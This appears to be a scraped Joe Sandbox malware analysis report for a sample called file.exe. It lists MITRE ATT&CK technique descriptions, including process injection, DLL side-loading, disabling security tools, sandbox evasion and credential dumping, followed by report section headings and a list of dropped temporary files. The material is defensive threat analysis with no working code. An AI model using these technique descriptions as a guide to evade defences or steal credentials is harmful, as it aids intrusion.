Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_39b13177aa1788ae077cf99bc1cf916ddac40c4_10004810_9d730b21-5673-4d8c-844b-db0d3fb1ff6a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6FD.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB8B3.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB8F3.tmp.xml

C:\Users\user\AppData\Local\Temp\tmp1AE8.tmp

C:\Users\user\AppData\Local\Temp\tmp1B08.tmp

C:\Users\user\AppData\Local\Temp\tmp1B19.tmp

C:\Users\user\AppData\Local\Temp\tmp1B29.tmp

C:\Users\user\AppData\Local\Temp\tmp30CD.tmp

C:\Users\user\AppData\Local\Temp\tmp30FC.tmp

C:\Users\user\AppData\Local\Temp\tmp5257.tmp

C:\Users\user\AppData\Local\Temp\tmp5268.tmp

C:\Users\user\AppData\Local\Temp\tmp5288.tmp

C:\Users\user\AppData\Local\Temp\tmp5299.tmp

C:\Users\user\AppData\Local\Temp\tmp529A.tmp

C:\Users\user\AppData\Local\Temp\tmp52AB.tmp

C:\Users\user\AppData\Local\Temp\tmp60E4.tmp

C:\Users\user\AppData\Local\Temp\tmp60F4.tmp

C:\Users\user\AppData\Local\Temp\tmp89B9.tmp

Windows Analysis Report
file.exe

Function 000001D6098CAA1C Relevance: 2.9, APIs: 2, Instructions: 382
memoryCOMMON